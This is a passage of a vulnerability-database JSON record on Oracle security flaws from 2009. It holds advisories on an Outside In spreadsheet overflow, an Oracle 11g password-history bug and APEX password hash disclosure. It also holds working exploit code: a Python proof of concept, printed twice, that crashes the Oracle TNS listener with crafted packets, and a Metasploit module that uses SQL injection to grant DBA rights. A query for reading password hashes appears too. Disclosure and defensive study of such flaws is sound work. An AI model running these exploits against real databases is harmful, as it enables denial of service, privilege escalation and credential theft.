off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. 
For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of an integer overflow vulnerability in Oracle\r\nCorp.'s Outside In Technology, as included in various vendors' software\r\ndistributions, allows attacker to execute arbitrary code.\r\n\r\nThis vulnerability exists when handling specific records within a\r\nspecially crafted Microsoft Excel spreadsheet file. Within the\r\nvulnerable function, an integer value is read from the file. This value\r\nis later used in an arithmetic integer calculation. Since no validation\r\nis performed, an integer overflow can occur. This results in the\r\nallocation of a buffer that is too small to hold the data that is\r\nsubsequently read from the file. A heap buffer overflow occurs, leading\r\nto an exploitable condition.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to execute arbitrary\r\ncode. In order to exploit this vulnerability, the attacker must somehow\r\nsupply a malformed document to an application that will process the\r\ndocument with Outside In Technology. Likewise, the privileges gained\r\nwill also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. 
This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability using the follow\r\nversions of Outside In on Windows Server 2003.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1010 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. 
DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21835", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21835", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Spreadsheet Integer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Many security standards require the tracking of users' password history to \r\nprevent password re-use. In Oracle 11g (11.1.0.6), if a security \r\nadministrator has enabled 11g passwords exclusively then tracking password \r\nhistory is broken. This can affect compliance. This was addressed by Oracle \r\nin their April 2009 Critical Patch Update and maps to the currently \r\nunspecified vulnerability at \r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988\r\nCheers,\r\nDavid Litchfield\r\nNGSSoftware Ltd\r\nhttp://www.ngssoftware.com/\r\n\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. 
If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: Manchester Technology Centre,\r\nOxford Road, Manchester, M1 7EF with Company Number 04225835 and\r\nVAT Number 783096402 \r\n", "modified": "2009-08-26T00:00:00", "published": "2009-08-26T00:00:00", "id": "SECURITYVULNS:DOC:22380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22380", "title": "Oracle 11g (11.1.0.6) Password Policy and Compliance", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:52", "bulletinFamily": "exploit", "description": "", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "href": "https://packetstormsecurity.com/files/76855/Oracle-RDBMS-TNS-Listener-Proof-Of-Concept.html", "id": "PACKETSTORM:76855", "type": "packetstorm", "title": "Oracle RDBMS TNS Listener Proof Of Concept", "sourceData": "`# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll) \n \n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied \n \n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info> \n \n# Fixed in CPUapr2009, CVE-2009-0991 \n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html \n \nfrom sys import * \nfrom socket import * \n \nsockobj = socket(AF_INET, SOCK_STREAM) \n \nsockobj.connect 
((argv[1], 1521)) \n \nsockobj.send( \n\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\" \n\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\" \n\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\" \n\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\" \n\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\") \n \ndata=sockobj.recv(102400) \n \nsockobj.send( \n\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\" \n\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\" \n\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\" \n\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\" \n\"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\" \n\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\" \n\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\" \n\"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\" \n\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\" \n\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\" \n\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\" \n\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\" 
\n\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\" \n\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\" \n\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\" \n\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\" \n\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\" \n\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\" \n\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\" \n\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\" \n\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\" \n\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d\" \n\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\" \n\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\" \n\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\" \n\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\" \n\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00\" \n\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\" \n\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\" \n\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\" \n\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\" \n\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\" 
\n\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\" \n\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\" \n\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\" \n\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\" \n\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\" \n\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\" \n\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\" \n) \n \nsockobj.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/76855/oraclerdbms-poc.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:24", "bulletinFamily": "exploit", "description": "", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "href": "https://packetstormsecurity.com/files/76731/APEX-Password-Hash-Disclosure.html", "id": "PACKETSTORM:76731", "type": "packetstorm", "title": "APEX Password Hash Disclosure", "sourceData": "`Name Unprivileged DB users can see APEX password hashes \nSystems Affected APEX 3.0 (optional component of 11.1.0.7 installation) \nSeverity High Risk \nCategory Password Disclosure \nVendor URL http://www.oracle.com/ \nAuthor Alexander Kornbrust (ak at red-database-security.com) \nCVE CVE-2009-0981 \nAdvisory 14 April 2009 (V 1.00) \n \n \nDetails: \nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. 
\n \nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS \n \nUSER_NAME WEB_PASSWORD2 \n---------------------------------------------------------------------- \nYURI 141FA790354FB6C72802FDEA86353F31 \n \nThis password hash can be checked using a tool like Repscan. \n \n \nAdditional information is available in the following advisory. \n \n \nAdvisory: \nhttp://www.red-database-security.com/advisory/apex_password_hashes.html \n \n \nPatch Information: \nUpgrade to Oracle APEX 3.2. \n \n \nVerification: \nOur Oracle database scanner Repscan was updated with the information from the Oracle \nCPU April 2009 and can identify vulnerable databases. \nMore Information about Repscan can be found here: \nhttp://www.sentrigo.com/repscan \n \n \nHistory: \n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] \n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] \n14-apr-2009 Advisory published \n \n \nAbout Red-Database-Security: \nRed-Database-Security is the leading company for Oracle security. Within the last \n6 years we reported several hundred vulnerabilities to Oracle. \n \n-- \n(c) 2009 by Red-Database-Security GmbH \nhttp://www.red-database-security.com \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/76731/apex-disclose.txt"}], "metasploit": [{"lastseen": "2018-08-07T13:13:42", "bulletinFamily": "exploit", "description": "This module exploits a sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. 
Any user with execute privilege on the vulnerable package can exploit this vulnerability.", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/LT_ROLLBACKWORKSPACE", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE',\n 'Description' => %q{\n This module exploits a sql injection flaw in the ROLLBACKWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-0978' ],\n [ 'OSVDB', '53734'],\n [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ],\n ],\n 'DisclosureDate' => 'May 4 2009'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)\n cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1)\n\n function = \"\n CREATE OR REPLACE FUNCTION #{cruft}\n RETURN VARCHAR2 AUTHID CURRENT_USER\n AS\n PRAGMA AUTONOMOUS_TRANSACTION;\n BEGIN\n EXECUTE IMMEDIATE '#{datastore['SQL']}';\n COMMIT;\n RETURN '#{cruft}';\n END;\"\n\n package1 = %Q|\n BEGIN\n SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n package2 = %Q|\n 
BEGIN\n SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');\n END;\n |\n\n uno = Rex::Text.encode_base64(function)\n dos = Rex::Text.encode_base64(package1)\n tres = Rex::Text.encode_base64(package2)\n\n sql = %Q|\n DECLARE\n #{rand1} VARCHAR2(32767);\n #{rand2} VARCHAR2(32767);\n #{rand3} VARCHAR2(32767);\n BEGIN\n #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));\n EXECUTE IMMEDIATE #{rand1};\n #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));\n EXECUTE IMMEDIATE #{rand2};\n #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));\n EXECUTE IMMEDIATE #{rand3};\n END;\n |\n\n clean = \"DROP FUNCTION #{cruft}\"\n\n print_status(\"Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...\")\n prepare_exec(sql)\n print_status(\"Removing function '#{cruft}'...\")\n prepare_exec(clean)\n end\nend\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb"}], "exploitdb": [{"lastseen": "2016-02-01T07:31:46", "bulletinFamily": "exploit", "description": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991). CVE-2009-0991. 
Dos exploit for windows platform", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "EDB-ID:8507", "href": "https://www.exploit-db.com/exploits/8507/", "type": "exploitdb", "title": "Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC", "sourceData": "# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev <dennis@conus.info>\r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\"\r\n\t\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\"\r\n\t\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\"\r\n\t\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\"\r\n\t\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\"\r\n\t\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\"\r\n\t\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\"\r\n\t\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\"\r\n\t\"\\x23\\x00\\x00\\x00\\x42\\x45\\x4
3\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\"\r\n\t\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\"\r\n\t\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\"\r\n\t\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\"\r\n\t\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\"\r\n\t\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\"\r\n\t\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\"\r\n\t\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\"\r\n\t\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\"\r\n\t\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\"\r\n\t\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\"\r\n\t\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\"\r\n\t\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\"\r\n\t\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8
